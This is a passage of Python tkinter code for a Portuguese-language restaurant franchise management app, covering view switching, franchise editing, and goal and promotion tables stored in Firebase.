self.lojas.destroy()\r\n \r\n try:\r\n self.bfranquia1.destroy()\r\n self.bfranquia2.destroy()\r\n self.bfranquia3.destroy()\r\n self.bfranquia4.destroy()\r\n self.bfranquia5.destroy()\r\n except AttributeError:\r\n pass\r\n \r\n self.salao = tk.Button(self.mainwindow, bg = \"peru\", fg= \"black\" ,text=\"Salão\", font= (\"verdana\", 10), command = self.selecionarsalao, height= 2, width = 40)\r\n self.salao.pack(side=\"left\", anchor= \"n\", fill=\"x\", expand= True)\r\n self.cozinha = tk.Button(self.mainwindow, bg = \"peru\", fg= \"black\", text=\"Cozinha\", font= (\"verdana\", 10), command = self.selecionarcozinha, height= 2, width = 40)\r\n self.cozinha.pack(side=\"left\", anchor= \"n\", fill=\"x\", expand= True)\r\n \r\n self.adm = tk.Button(self.mainwindow, bg = \"peru\", fg= \"black\", text=\"Setor Administrativo\",font= (\"verdana\", 10), command = self.selecionaradm, height= 2, width = 40)\r\n self.adm.pack(side=\"left\", anchor= \"n\", fill=\"x\", expand= True)\r\n \r\n self.selecionarsalao()\r\n \r\n def Franquia3(self):\r\n self.franquiaselecionada = firebase.get(self.bfranquia3.cget(\"text\"), None)\r\n self.selecionada = self.bfranquia3.cget(\"text\")\r\n self.imagems.destroy()\r\n self.texto.destroy()\r\n self.texto1.destroy()\r\n self.texto2.destroy()\r\n self.texto3.destroy()\r\n self.texto4.destroy()\r\n self.lojas.destroy()\r\n \r\n try:\r\n self.bfranquia1.destroy()\r\n self.bfranquia2.destroy()\r\n self.bfranquia3.destroy()\r\n self.bfranquia4.destroy()\r\n self.bfranquia5.destroy()\r\n except AttributeError:\r\n pass\r\n \r\n self.salao = tk.Button(self.mainwindow, bg = \"peru\", fg= \"black\" ,text=\"Salão\", font= (\"verdana\", 10), command = self.selecionarsalao, height= 2, width = 40)\r\n self.salao.pack(side=\"left\", anchor= \"n\", fill=\"x\", expand= True)\r\n self.cozinha = tk.Button(self.mainwindow, bg = \"peru\", fg= \"black\", text=\"Cozinha\", font= (\"verdana\", 10), command = self.selecionarcozinha, height= 2, width = 40)\r\n self.cozinha.pack(side=\"left\", anchor= \"n\", fill=\"x\", expand= True)\r\n \r\n self.adm = tk.Button(self.mainwindow, bg = \"peru\", fg= \"black\", text=\"Setor Administrativo\",font= (\"verdana\", 10), command = self.selecionaradm, height= 2, width = 40)\r\n self.adm.pack(side=\"left\", anchor= \"n\", fill=\"x\", expand= True)\r\n \r\n self.selecionarsalao()\r\n \r\n def Franquia4(self):\r\n self.franquiaselecionada = firebase.get(self.bfranquia4.cget(\"text\"), None)\r\n self.selecionada = self.bfranquia4.cget(\"text\")\r\n self.imagems.destroy()\r\n self.texto.destroy()\r\n self.texto1.destroy()\r\n self.texto2.destroy()\r\n self.texto3.destroy()\r\n self.texto4.destroy()\r\n self.lojas.destroy()\r\n \r\n try:\r\n self.bfranquia1.destroy()\r\n self.bfranquia2.destroy()\r\n self.bfranquia3.destroy()\r\n self.bfranquia4.destroy()\r\n self.bfranquia5.destroy()\r\n except AttributeError:\r\n pass\r\n \r\n self.salao = tk.Button(self.mainwindow, bg = \"peru\", fg= \"black\" ,text=\"Salão\", font= (\"verdana\", 10), command = self.selecionarsalao, height= 2, width = 40)\r\n self.salao.pack(side=\"left\", anchor= \"n\", fill=\"x\", expand= True)\r\n self.cozinha = tk.Button(self.mainwindow, bg = \"peru\", fg= \"black\", text=\"Cozinha\", font= (\"verdana\", 10), command = self.selecionarcozinha, height= 2, width = 40)\r\n self.cozinha.pack(side=\"left\", anchor= \"n\", fill=\"x\", expand= True)\r\n \r\n self.adm = tk.Button(self.mainwindow, bg = \"peru\", fg= \"black\", text=\"Setor Administrativo\",font= (\"verdana\", 10), command = self.selecionaradm, height= 2, width = 40)\r\n self.adm.pack(side=\"left\", anchor= \"n\", fill=\"x\", expand= True)\r\n \r\n self.selecionarsalao()\r\n def Franquia5(self):\r\n self.franquiaselecionada = firebase.get(self.bfranquia5.cget(\"text\"), None)\r\n self.selecionada = self.bfranquia5.cget(\"text\")\r\n self.imagems.destroy()\r\n self.texto.destroy()\r\n self.texto1.destroy()\r\n self.texto2.destroy()\r\n self.texto3.destroy()\r\n self.texto4.destroy()\r\n self.lojas.destroy()\r\n \r\n try:\r\n self.bfranquia1.destroy()\r\n self.bfranquia2.destroy()\r\n self.bfranquia3.destroy()\r\n self.bfranquia4.destroy()\r\n self.bfranquia5.destroy()\r\n except AttributeError:\r\n pass\r\n \r\n self.salao = tk.Button(self.mainwindow, bg = \"peru\", fg= \"black\" ,text=\"Salão\", font= (\"verdana\", 10), command = self.selecionarsalao, height= 2, width = 40)\r\n self.salao.pack(side=\"left\", anchor= \"n\", fill=\"x\", expand= True)\r\n self.cozinha = tk.Button(self.mainwindow, bg = \"peru\", fg= \"black\", text=\"Cozinha\", font= (\"verdana\", 10), command = self.selecionarcozinha, height= 2, width = 40)\r\n self.cozinha.pack(side=\"left\", anchor= \"n\", fill=\"x\", expand= True)\r\n \r\n self.adm = tk.Button(self.mainwindow, bg = \"peru\", fg= \"black\", text=\"Setor Administrativo\",font= (\"verdana\", 10), command = self.selecionaradm, height= 2, width = 40)\r\n self.adm.pack(side=\"left\", anchor= \"n\", fill=\"x\", expand= True)\r\n \r\n self.selecionarsalao()\r\n \r\n def configuracoesf(self):\r\n self.iniciar.destroy()\r\n self.configuracoes.destroy()\r\n self.voicecommand1.destroy()\r\n self.sair.destroy()\r\n self.editarnome = tk.Button(self.mainwindow, text = \"Editar nome da franquia\", font = (\"verdana\", 10), bg = \"peru\", height= 2, width = 40, command = self.editarnomefranquia)\r\n self.editarendereco = tk.Button(self.mainwindow, text = \"Editar endereço da franquia\", font = (\"verdana\", 10), bg = \"peru\", height= 2, width = 40, command = self.editarenderecofranquia)\r\n self.voltarconfig = tk.Button(self.mainwindow, text = \"Voltar\", font = (\"verdana\", 10), bg = \"peru\", height= 2, width = 40, command = self.voltarconfigfranquias)\r\n self.editarnome.place(x = 900, y = 350)\r\n self.editarendereco.place(x = 900 , y = 400)\r\n self.voltarconfig.place(x = 900, y = 450)\r\n \r\n def voltarconfigfranquias(self):\r\n self.editarnome.destroy()\r\n self.editarendereco.destroy()\r\n self.voltarconfig.destroy()\r\n self.abrir()\r\n \r\n \r\n \r\n def editarnomefranquia(self):\r\n dados2 = firebase.get(\"\", None)\r\n listadelojas = list()\r\n for i in dados2:\r\n listadelojas.append(i)\r\n listadelojas.remove(\"Acesso\")\r\n self.janelaeditarnome = tk.Toplevel()\r\n self.janelaeditarnome.wm_title(\"Editar Nome da franquia\")\r\n self.janelaeditarnome.geometry(\"400x300\")\r\n self.janelaeditarnome.configure(bg = \"sandy brown\")\r\n self.nomeeditar = tk.Label(self.janelaeditarnome, text = \"Franquia:\", bg = \"sandy brown\", font = (\"verdana\", 10))\r\n self.nomeeditarcombo = ttk.Combobox(self.janelaeditarnome, values = listadelojas, width = 17)\r\n self.nomenovofranquia = tk.Label(self.janelaeditarnome, text = \"Novo nome:\", bg = \"sandy brown\", font = (\"verdana\", 10))\r\n self.nomenovofranquiaentry = tk.Entry(self.janelaeditarnome, bg = \"peru\")\r\n self.nomeeditar.place(x = 50, y= 40)\r\n self.nomeeditarcombo.place(x = 190, y = 40)\r\n self.nomenovofranquia.place(x = 50, y = 80)\r\n self.nomenovofranquiaentry.place(x = 190, y = 80)\r\n self.botaoselecionarenome = tk.Button(self.janelaeditarnome, bg = \"peru\", fg = \"black\", text = \"Selecionar\", command = self.nomefranquiaselecionada, height= 2, width = 40)\r\n self.botaoselecionarenome.place(x = 55, y = 225)\r\n def nomefranquiaselecionada(self):\r\n self.listacombo = list()\r\n for i in listadelojas:\r\n self.listacombo.append(i)\r\n self.logins[self.nomenovofranquiaentry.get()] = self.logins.pop(self.listacombo[self.nomeeditarcombo.current()])\r\n firebase.patch(\"\", self.logins)\r\n firebase.delete(\"\", self.listacombo[self.nomeeditarcombo.current()])\r\n self.janelaeditarnome.destroy()\r\n# firebase.delete(self.logins[self.listacombo[self.nomeeditarcombo.current()], None])\r\n def editarenderecofranquia(self):\r\n dados3 = firebase.get(\"\", None)\r\n listadelojas1 = list()\r\n for i in dados3:\r\n listadelojas1.append(i)\r\n listadelojas1.remove(\"Acesso\")\r\n self.janelaeditarendereco = tk.Toplevel()\r\n self.janelaeditarendereco.wm_title(\"Editar Endereço da franquia\")\r\n self.janelaeditarendereco.geometry(\"400x300\")\r\n self.janelaeditarendereco.configure(bg = \"sandy brown\")\r\n self.nomeeditarenderecof = tk.Label(self.janelaeditarendereco, text = \"Franquia:\", bg = \"sandy brown\", font = (\"verdana\", 10))\r\n self.nomeeditarecombo = ttk.Combobox(self.janelaeditarendereco, values = listadelojas1, width = 17)\r\n self.endereconovofranquia = tk.Label(self.janelaeditarendereco, text = \"Novo Endereço:\", bg = \"sandy brown\", font = (\"verdana\", 10))\r\n self.endereconovofranquiaentry = tk.Entry(self.janelaeditarendereco, bg = \"peru\")\r\n self.nomeeditarenderecof.place(x = 50, y= 40)\r\n self.nomeeditarecombo.place(x = 190, y = 40)\r\n self.endereconovofranquia.place(x = 50, y = 80)\r\n self.endereconovofranquiaentry.place(x = 190, y = 80)\r\n self.botaoselecionarenomee = tk.Button(self.janelaeditarendereco, bg = \"peru\", fg = \"black\", text = \"Selecionar\", command = self.enderecofranquiaselecionada, height= 2, width = 40)\r\n self.botaoselecionarenomee.place(x = 55, y = 225)\r\n \r\n def enderecofranquiaselecionada(self):\r\n self.listacombo1 = list()\r\n for i in listadelojas:\r\n self.listacombo1.append(i)\r\n self.logins[self.listacombo1[self.nomeeditarecombo.current()]][\"Dados\"][\"Endereco\"] = self.endereconovofranquiaentry.get()\r\n firebase.patch(\"\", self.logins)\r\n self.janelaeditarendereco.destroy()\r\n def selecionarloja(self):\r\n self.salao = tk.Button(self.mainwindow, bg = \"white\", fg= \"black\" ,text=\"Salão\", command = self.selecionarsalao)\r\n self.salao.pack(side=\"left\", anchor= \"n\", fill=\"x\", expand= True)\r\n self.cozinha = tk.Button(self.mainwindow, bg = \"white\", fg= \"black\", text=\"Cozinha\", command = self.selecionarcozinha)\r\n self.cozinha.pack(side=\"left\", anchor= \"n\", fill=\"x\", expand= True)\r\n \r\n self.adm = tk.Button(self.mainwindow, bg = \"white\", fg= \"black\", text=\"Setor Administrativo\", command = self.selecionaradm)\r\n self.adm.pack(side=\"left\", anchor= \"n\", fill=\"x\", expand= True)\r\n \r\n def comeco(self):\r\n self.mainwindow.attributes(\"-fullscreen\", True)\r\n self.mainwindow.bind(\"\", lambda e: self.mainwindow.destroy())\r\n self.mainwindow.mainloop()\r\n \r\n \r\n def bloquear(self):\r\n pass\r\n \r\n \r\n def selecionaradm(self):\r\n variavelnumeropedidos = self.franquiaselecionada[\"Dados\"][\"NPedidos\"]\r\n variavelnumeromesas = self.franquiaselecionada[\"Dados\"][\"NPedidos\"]\r\n variavelnumerofuncionarios = self.franquiaselecionada[\"Dados\"][\"NFuncionarios\"]\r\n variavelreceitabruta = self.franquiaselecionada[\"Dados\"][\"NReceita\"]\r\n variaveldespesas = self.franquiaselecionada[\"Dados\"][\"NDespesas\"]\r\n variavelfaturamento = self.franquiaselecionada[\"Dados\"][\"NReceita\"] - self.franquiaselecionada[\"Dados\"][\"NDespesas\"]\r\n variavelreservas = self.franquiaselecionada[\"Dados\"][\"NReservas\"]\r\n try:\r\n self.InventoryTitle.destroy()\r\n self.Inventory.destroy()\r\n self.InventoryEdit.destroy()\r\n self.InventoryAdd.destroy()\r\n self.Reposition.destroy()\r\n self.OrdersTitle.destroy()\r\n self.OrdersTable.destroy()\r\n self.PlaceOrder.destroy()\r\n self.EditOrder.destroy()\r\n self.RemoveOrder.destroy()\r\n self.voicecommand5.destroy()\r\n except:\r\n pass\r\n try: \r\n self.voicecommand3.destroy()\r\n \r\n except:\r\n pass\r\n try:\r\n self.adm.configure(command = self.bloquear)\r\n self.cozinha.configure(command = self.selecionarcozinha)\r\n self.salao.configure(command = self.selecionarsalao)\r\n except:\r\n pass\r\n \r\n try:\r\n self.cozinha.configure(bg = \"peru\", fg = \"black\")\r\n except:\r\n pass\r\n \r\n try:\r\n self.salao.configure(bg = \"peru\", fg = \"black\")\r\n except:\r\n pass\r\n try:\r\n self.adm.configure(bg = \"black\", fg = \"white\")\r\n self.enderecotitle.destroy()\r\n self.endereco.destroy()\r\n self.verde1f.destroy()\r\n self.verde2f.destroy()\r\n self.verde3f.destroy()\r\n self.verde4f.destroy()\r\n self.verde5f.destroy()\r\n self.verde6f.destroy()\r\n self.verde7f.destroy()\r\n self.verde8f.destroy()\r\n self.verde9f.destroy()\r\n self.verde10f.destroy()\r\n self.verde11f.destroy()\r\n self.verde12f.destroy()\r\n self.verde13f.destroy()\r\n self.verde14f.destroy()\r\n self.verde15f.destroy()\r\n self.verde16f.destroy()\r\n self.verde17f.destroy()\r\n self.verde18f.destroy()\r\n self.verde19f.destroy()\r\n self.verde20f.destroy()\r\n self.verde21f.destroy()\r\n self.verde22f.destroy()\r\n self.verde23f.destroy()\r\n self.verde24f.destroy()\r\n self.verde25f.destroy()\r\n self.verde26f.destroy()\r\n self.verde27f.destroy()\r\n self.verde28f.destroy()\r\n self.verde29f.destroy()\r\n self.verde30f.destroy()\r\n self.vermelho1f.destroy()\r\n self.vermelho2f.destroy()\r\n self.vermelho3f.destroy()\r\n self.vermelho4f.destroy()\r\n self.vermelho5f.destroy()\r\n self.vermelho6f.destroy()\r\n self.vermelho7f.destroy()\r\n self.vermelho8f.destroy()\r\n self.vermelho9f.destroy()\r\n self.vermelho10f.destroy()\r\n self.vermelho11f.destroy()\r\n self.vermelho12f.destroy()\r\n self.vermelho13f.destroy()\r\n self.vermelho14f.destroy()\r\n self.vermelho15f.destroy()\r\n self.vermelho16f.destroy()\r\n self.vermelho17f.destroy()\r\n self.vermelho18f.destroy()\r\n self.vermelho19f.destroy()\r\n self.vermelho20f.destroy()\r\n self.vermelho21f.destroy()\r\n self.vermelho22f.destroy()\r\n self.vermelho23f.destroy()\r\n self.vermelho24f.destroy()\r\n self.vermelho25f.destroy()\r\n self.vermelho26f.destroy()\r\n self.vermelho27f.destroy()\r\n self.vermelho28f.destroy()\r\n self.vermelho29f.destroy()\r\n self.vermelho30f.destroy()\r\n self.reservas.destroy()\r\n self.tablereservas.destroy()\r\n self.badicionarreserva.destroy()\r\n self.beditareserva.destroy()\r\n self.bremoverreserva.destroy() \r\n self.imagemslogosalao.destroy()\r\n \r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n except AttributeError:\r\n pass\r\n \r\n self.voicecommand4 = tk.Button(self.mainwindow, bg = \"cyan\" , image = self.imagemmic1, command = self.voicebutton4, height= 50, width = 50)\r\n self.voicecommand4.image = self.imagemmic1\r\n self.voicecommand4.place(x = 1465, y = 795)\r\n \r\n self.adm.configure(bg=\"black\", fg = \"white\")\r\n \r\n self.fundofinancas = tk.Canvas(self.mainwindow, width = 450, height = 200, bg = \"peru\")\r\n self.fundofinancas.place(x = 20, y = 90)\r\n self.metas = tk.Label(self.mainwindow, text= \"Metas: \", font = (\"Verdana\", 20), bg = \"sandy brown\")\r\n self.promocoes = tk.Label(self.mainwindow, text = \"Promoções: \", font= (\"Verdana\", 20), bg = \"sandy brown\")\r\n self.gerenciamento = tk.Label(self.mainwindow, text = \"Gerenciamento: \", font = (\"Verdana\", 20), bg = \"sandy brown\")\r\n self.financas = tk.Label(self.mainwindow, text = \"Finanças: \", font = (\"Verdana\", 20), bg= \"sandy brown\")\r\n self.tpedidos = tk.Label(self.mainwindow, text = \"Total de Pedidos: \" + str(variavelnumeropedidos), font = (\"Verdana\", 11), bg= \"peru\")\r\n self.totalmesas = tk.Label(self.mainwindow, text = \"Total de mesas atendidas: \" + str(variavelnumeromesas), font = (\"Verdana\", 11), bg= \"peru\")\r\n self.tfuncionarios = tk.Label(self.mainwindow, text = \"Total de funcionários trabalhando: \" + str(variavelnumerofuncionarios), font = (\"Verdana\", 11), bg= \"peru\")\r\n self.tbruta = tk.Label(self.mainwindow, text = \"Receita bruta: \" + str(variavelreceitabruta), font = (\"Verdana\", 11), bg= \"peru\")\r\n self.tdespesas = tk.Label(self.mainwindow, text = \"Despesas: \" + str(variaveldespesas), font = (\"Verdana\", 11), bg= \"peru\")\r\n self.tfaturamento = tk.Label(self.mainwindow, text = \"Faturamento: \" + str(variavelfaturamento), font = (\"Verdana\", 11), bg= \"peru\")\r\n self.treservas = tk.Label(self.mainwindow, text = \"Total de reservas: \" + str(variavelreservas), font = (\"Verdana\", 11), bg= \"peru\")\r\n self.tpedidos.place(x = 30, y = 100)\r\n self.totalmesas.place(x = 30, y = 120)\r\n self.tfuncionarios.place(x = 30, y = 140)\r\n self.tbruta.place(x = 30, y = 160)\r\n self.tdespesas.place(x = 30, y = 180)\r\n self.tfaturamento.place(x = 30, y = 200)\r\n self.treservas.place(x=30, y = 220)\r\n \r\n self.gerenciamento.place(x = 140, y = 310)\r\n self.financas.place(x = 175, y = 50)\r\n self.promocoes.place(x =1000, y = 50)\r\n self.metas.place(x = 700, y = 480)\r\n \r\n self.tablepromocoes = ttk.Treeview(self.mainwindow, columns=(\"inicio\", \"fim\", \"descricao\"))\r\n self.tablepromocoes.configure(height = 0)\r\n \r\n self.tablepromocoes.heading(\"#0\", text = \"Nome\")\r\n self.tablepromocoes.heading(\"#1\", text = \"Data de início\")\r\n self.tablepromocoes.heading(\"#2\", text = \"Data de finalização\")\r\n self.tablepromocoes.heading(\"#3\", text = \"Descrição\")\r\n self.tablepromocoes.column(\"#0\", anchor = \"center\", width = 120)\r\n self.tablepromocoes.column(\"#1\", anchor = \"center\", width = 90)\r\n self.tablepromocoes.column(\"#2\", anchor = \"center\", width = 110)\r\n self.tablepromocoes.column(\"#3\", anchor = \"center\", width = 500)\r\n \r\n \r\n self.tablepromocoes.place(x = 690, y = 90)\r\n self.badicionarpromocao = tk.Button(self.mainwindow, bg = \"peru\", fg = \"black\", text = \"Adicionar promoção\", command = self.adicionarpromocao, height = 2, width = 25, font= (\"verdana\", 10))\r\n self.bremoverpromocao = tk.Button(self.mainwindow, bg = \"peru\", fg = \"black\", text = \"Encerrar promoção\", command = self.removerpromocao, height = 2, width = 25, font= (\"verdana\", 10))\r\n self.beditarpromocao = tk.Button(self.mainwindow, bg = \"peru\", fg = \"black\", text = \"Editar promoção\", command = self.editarpromocao, height = 2, width = 25, font= (\"verdana\", 10))\r\n self.badicionarpromocao.place(x = 690, y = 420)\r\n self.beditarpromocao.place(x = 990, y = 420)\r\n self.bremoverpromocao.place(x = 1290, y = 420)\r\n \r\n \r\n self.bfuncionarios = tk.Button(self.mainwindow, bg = \"peru\", fg = \"black\", text = \"Funcionários\", command = self.selecionarfuncionarios, height = 2, width = 25, font= (\"verdana\", 10))\r\n self.bdespesas = tk.Button(self.mainwindow, bg = \"peru\", fg = \"black\", text = \"Despesas\", command = self.selecionardespesas, height = 2, width = 25, font= (\"verdana\", 10))\r\n self.blicensas = tk.Button(self.mainwindow, bg = \"peru\", fg = \"black\", text = \"Licenças\", command = self.selecionarlicencas, height = 2, width = 25, font= (\"verdana\", 10))\r\n self.blogins = tk.Button(self.mainwindow, bg = \"peru\", fg = \"black\", text = \"Logins\", command = self.selecionarlogins, height = 2, width = 25, font= (\"verdana\", 10))\r\n self.bdespesas.place(x = 30, y = 360)\r\n self.bfuncionarios.place(x = 30, y = 420)\r\n self.blicensas.place(x = 270, y = 360)\r\n self.blogins.place(x = 270, y = 420)\r\n \r\n self.canvasmetas = tk.Canvas(self.mainwindow, highlightbackground=\"white\",highlightcolor=\"white\", width = 1325, height = 300, bg = \"aquamarine\")\r\n self.canvasmetas.place(x = 90, y = 535)\r\n self.cormeta = \"bisque2\"\r\n self.baddmetas = tk.Button(self.mainwindow, bg = self.cormeta, fg = \"black\", text = \"Adicionar meta\", command = self.addmeta, height = 2, width = 25, font= (\"verdana\", 10))\r\n self.beditarmetas = tk.Button(self.mainwindow, bg = self.cormeta, fg = \"black\", text = \"Editar meta\", command = self.editarmeta, height = 2, width = 25, font= (\"verdana\", 10))\r\n self.bremovermetas = tk.Button(self.mainwindow, bg = self.cormeta, fg = \"black\", text = \"Remover meta\", command = self.removermeta, height = 2, width = 25, font= (\"verdana\", 10))\r\n \r\n self.tablemetas = ttk.Treeview(self.mainwindow, columns=(\"inicio\", \"fim\", \"descricao\"))\r\n self.tablemetas.configure(height = 0)\r\n \r\n self.tablemetas.heading(\"#0\", text = \"Meta\")\r\n self.tablemetas.heading(\"#1\", text = \"Data de início\")\r\n self.tablemetas.heading(\"#2\", text = \"Expiração\")\r\n self.tablemetas.heading(\"#3\", text = \"Descrição\")\r\n self.tablemetas.column(\"#0\", anchor = \"center\", width = 300)\r\n self.tablemetas.column(\"#1\", anchor = \"center\", width = 90)\r\n self.tablemetas.column(\"#2\", anchor = \"center\", width = 110)\r\n self.tablemetas.column(\"#3\", anchor = \"center\", width = 500)\r\n self.baddmetas.place(x =1180 , y = 590)\r\n self.beditarmetas.place(x =1180 , y = 650)\r\n self.bremovermetas.place(x =1180 , y = 710)\r\n self.tablemetas.place(x = 120, y = 560)\r\n try:\r\n self.tablepromocoes.tag_configure(\"Cor\", background = \"bisque2\")\r\n for i in self.franquiaselecionada[\"Promocoes\"]:\r\n self.tablepromocoes.insert(\"\", 1, \"\" , text = i, values = (self.franquiaselecionada[\"Promocoes\"][i][\"inicio\"], self.franquiaselecionada[\"Promocoes\"][i][\"expiracao\"], self.franquiaselecionada[\"Promocoes\"][i][\"desc\"]), tags = (\"Cor\"))\r\n self.tablepromocoes.configure(height = len(self.tablepromocoes.get_children()))\r\n except:\r\n pass\r\n \r\n try:\r\n self.tablemetas.tag_configure(\"Cor\", background = \"bisque2\")\r\n for i in self.franquiaselecionada[\"Metas\"]:\r\n self.tablemetas.insert(\"\", 1, \"\" , text = i, values = (self.franquiaselecionada[\"Metas\"][i][\"inicio\"], self.franquiaselecionada[\"Metas\"][i][\"expiracao\"], self.franquiaselecionada[\"Metas\"][i][\"desc\"]), tags = (\"Cor\"))\r\n self.tablemetas.configure(height = len(self.tablemetas.get_children()))\r\n except:\r\n pass\r\n \r\n \r\n \r\n def addmeta(self):\r\n self.janelaaddmeta = tk.Toplevel()\r\n self.janelaaddmeta.wm_title(\"Adicionar meta\")\r\n self.janelaaddmeta.geometry(\"400x300\")\r\n self.janelaaddmeta.configure(bg = \"sandy brown\")\r\n self.nomemeta = tk.Label(self.janelaaddmeta, text = \"Meta: \", bg = \"sandy brown\", font = (\"verdana\", 10))\r\n self.iniciometa = tk.Label(self.janelaaddmeta, text = \"Data de início: \", bg = \"sandy brown\", font = (\"verdana\", 10))\r\n self.finalmeta = tk.Label(self.janelaaddmeta, text = \"Data de expiração: \", bg = \"sandy brown\", font = (\"verdana\", 9))\r\n self.descmeta = tk.Label(self.janelaaddmeta, text = \"Descrição: \", bg = \"sandy brown\", font = (\"verdana\", 10))\r\n self.finalmetaentry = tk.Entry(self.janelaaddmeta, bg = \"peru\")\r\n self.descmetaentry = tk.Entry(self.janelaaddmeta, bg = \"peru\")\r\n self.nomemetaentry = tk.Entry(self.janelaaddmeta, bg = \"peru\")\r\n self.iniciometaentry = tk.Entry(self.janelaaddmeta, bg = \"peru\")\r\n self.nomemeta.place(x = 50, y= 40)\r\n self.nomemetaentry.place(x = 190, y = 40)\r\n self.iniciometa.place(x = 50, y= 80)\r\n self.iniciometaentry.place(x = 190, y = 80)\r\n self.finalmeta.place(x = 50, y = 120)\r\n self.finalmetaentry.place(x = 190, y = 120)\r\n self.descmeta.place(x = 50, y = 160)\r\n self.descmetaentry.place(x = 190, y = 160)\r\n self.botaoadicionarmeta = tk.Button(self.janelaaddmeta, bg = \"peru\", fg = \"black\", text = \"Adicionar meta\", command = self.inserirmeta, height= 2, width = 40)\r\n self.botaoadicionarmeta.place(x = 55, y = 225)\r\n \r\n def inserirmeta(self):\r\n if len(self.tablemetas.get_children()) < 8:\r\n self.tablemetas.insert(\"\", 1, \"\" , text = self.nomemetaentry.get(), values = (self.iniciometaentry.get(), self.finalmetaentry.get(), self.descmetaentry.get()), tags = (\"Cor\"))\r\n self.tablemetas.tag_configure(\"Cor\", background = \"bisque2\")\r\n self.tablemetas.configure(height = len(self.tablemetas.get_children()))\r\n self.franquiaselecionada[\"Metas\"][self.nomemetaentry.get()]= {\"inicio\": self.iniciometaentry.get(), \"expiracao\": self.finalmetaentry.get(), \"desc\": self.descmetaentry.get()}\r\n firebase.patch(self.selecionada, self.franquiaselecionada)\r\n self.janelaaddmeta.destroy()\r\n else:\r\n self.janelaaddmeta.destroy()\r\n self.errotabela()\r\n \r\n def editarmeta(self):\r\n self.janelaeditarmeta = tk.Toplevel()\r\n self.janelaeditarmeta.wm_title(\"Editar meta\")\r\n self.janelaeditarmeta.geometry(\"400x300\")\r\n self.janelaeditarmeta.configure(bg = \"sandy brown\")\r\n self.nomemetae = tk.Label(self.janelaeditarmeta, text = \"Nome: \", bg = \"sandy brown\", font = (\"verdana\", 10))\r\n self.nomemetaeentry = tk.Entry(self.janelaeditarmeta, bg = \"peru\")\r\n self.nomemetae.place(x = 50, y = 40)\r\n self.nomemetaeentry.place(x = 190, y = 40)\r\n self.bselecionaremeta = tk.Button(self.janelaeditarmeta, bg = \"peru\", fg = \"black\", font = (\"verdana\", 10), text = \"Selecionar meta\", command = self.editarmetaselecionada, height= 2, width = 20)\r\n self.bselecionaremeta.place(x = 110, y = 100)\r\n \r\n def editarmetaselecionada(self):\r\n if self.nomemetaeentry.get() in self.franquiaselecionada[\"Metas\"]:\r\n self.nomemetae.destroy()\r\n self.bselecionaremeta.destroy()\r\n self.nomemetaee = tk.Label(self.janelaeditarmeta, text = \"Meta: \", bg = \"sandy brown\", font = (\"verdana\",10))\r\n self.nomemetaeeentry = tk.Entry(self.janelaeditarmeta, bg = \"peru\")\r\n self.datametaee = tk.Label(self.janelaeditarmeta, text = \"Data de início: \", bg = \"sandy brown\", font = (\"verdana\", 10))\r\n self.datametaeeentry = tk.Entry(self.janelaeditarmeta, bg = \"peru\")\r\n self.finalmetaee = tk.Label(self.janelaeditarmeta, text = \"Data de expiração: \", bg = \"sandy brown\", font = (\"verdana\", 10))\r\n self.finalmetaeeentry = tk.Entry(self.janelaeditarmeta, bg = \"peru\")\r\n self.descricaometaee = tk.Label(self.janelaeditarmeta, text = \"Descrição: \", bg = \"sandy brown\", font = (\"verdana\", 10))\r\n self.descricaometaeeentry = tk.Entry(self.janelaeditarmeta, bg = \"peru\")\r\n self.nomemetaee.place(x = 50, y = 40)\r\n self.nomemetaeeentry.place(x = 190, y = 40)\r\n self.datametaee.place(x = 50, y = 70)\r\n self.datametaeeentry.place(x = 190, y = 70)\r\n self.finalmetaee.place(x = 50, y = 100)\r\n self.finalmetaeeentry.place(x = 190, y = 100)\r\n self.descricaometaee.place(x = 50, y = 130)\r\n self.descricaometaeeentry.place(x = 190, y = 130)\r\n \r\n self.nomemetaeeentry.insert(0, self.nomemetaeentry.get())\r\n self.nomemetaeeentry.configure(state = \"disabled\")\r\n self.datametaeeentry.insert(0, self.franquiaselecionada[\"Metas\"][self.nomemetaeeentry.get()][\"inicio\"])\r\n self.finalmetaeeentry.insert(0, self.franquiaselecionada[\"Metas\"][self.nomemetaeeentry.get()][\"expiracao\"])\r\n self.descricaometaeeentry.insert(0, self.franquiaselecionada[\"Metas\"][self.nomemetaeeentry.get()][\"desc\"])\r\n self.binserirmetaeditada = tk.Button(self.janelaeditarmeta, bg = \"peru\", fg = \"black\", font = (\"verdana\", 10), text = \"Editar\", command = self.editarmetaselecionadainserida, height= 2, width = 20)\r\n self.bcancelarinserirmetaeditada = tk.Button(self.janelaeditarmeta, bg = \"peru\", fg = \"black\", font = (\"verdana\", 10), text = \"Cancelar\", command = self.cancelareditarmetaselecionada, height= 2, width = 20)\r\n self.bcancelarinserirmetaeditada.place(x=10, y= 250 )\r\n self.binserirmetaeditada.place(x =220, y = 250)\r\n else:\r\n self.janelaeditarmeta.destroy()\r\n self.janelaerroedicao()\r\n\r\n def editarmetaselecionadainserida(self):\r\n self.franquiaselecionada[\"Metas\"][self.nomemetaeeentry.get()] = {\"inicio\": self.datametaeeentry.get(), \"expiracao\": self.finalmetaeeentry.get(), \"desc\": self.descricaometaeeentry.get()}\r\n firebase.patch(self.selecionada, self.franquiaselecionada) \r\n self.tablemetas.delete(*self.tablemetas.get_children())\r\n try:\r\n self.tablemetas.tag_configure(\"Cor\", background = \"bisque2\")\r\n for i in self.franquiaselecionada[\"Metas\"]:\r\n self.tablemetas.insert(\"\", 1, \"\" , text = i, values = (self.franquiaselecionada[\"Metas\"][i][\"inicio\"], self.franquiaselecionada[\"Metas\"][i][\"expiracao\"], self.franquiaselecionada[\"Metas\"][i][\"desc\"]), tags = (\"Cor\"))\r\n self.tablemetas.configure(height = len(self.tablemetas.get_children()))\r\n except:\r\n pass\r\n \r\n self.janelaeditarmeta.destroy()\r\n \r\n def cancelareditarmetaselecionada(self):\r\n self.janelaeditarmeta.destroy()\r\n \r\n def removermeta(self):\r\n self.janelarmetas = tk.Toplevel()\r\n self.janelarmetas.wm_title(\"Remover meta\")\r\n self.janelarmetas.geometry(\"400x300\")\r\n self.janelarmetas.configure(bg = \"sandy brown\")\r\n self.nomermeta = tk.Label(self.janelarmetas, text = \"Meta: \", bg = \"sandy brown\", font = (\"verdana\", 10))\r\n self.nomermetaentry = tk.Entry(self.janelarmetas, bg = \"peru\")\r\n self.nomermeta.place(x = 50, y = 40)\r\n self.nomermetaentry.place(x = 190, y = 40)\r\n self.botaoremovermeta = tk.Button(self.janelarmetas, bg = \"peru\", fg = \"black\", text = \"Remover meta\", command = self.removermetatabela, height= 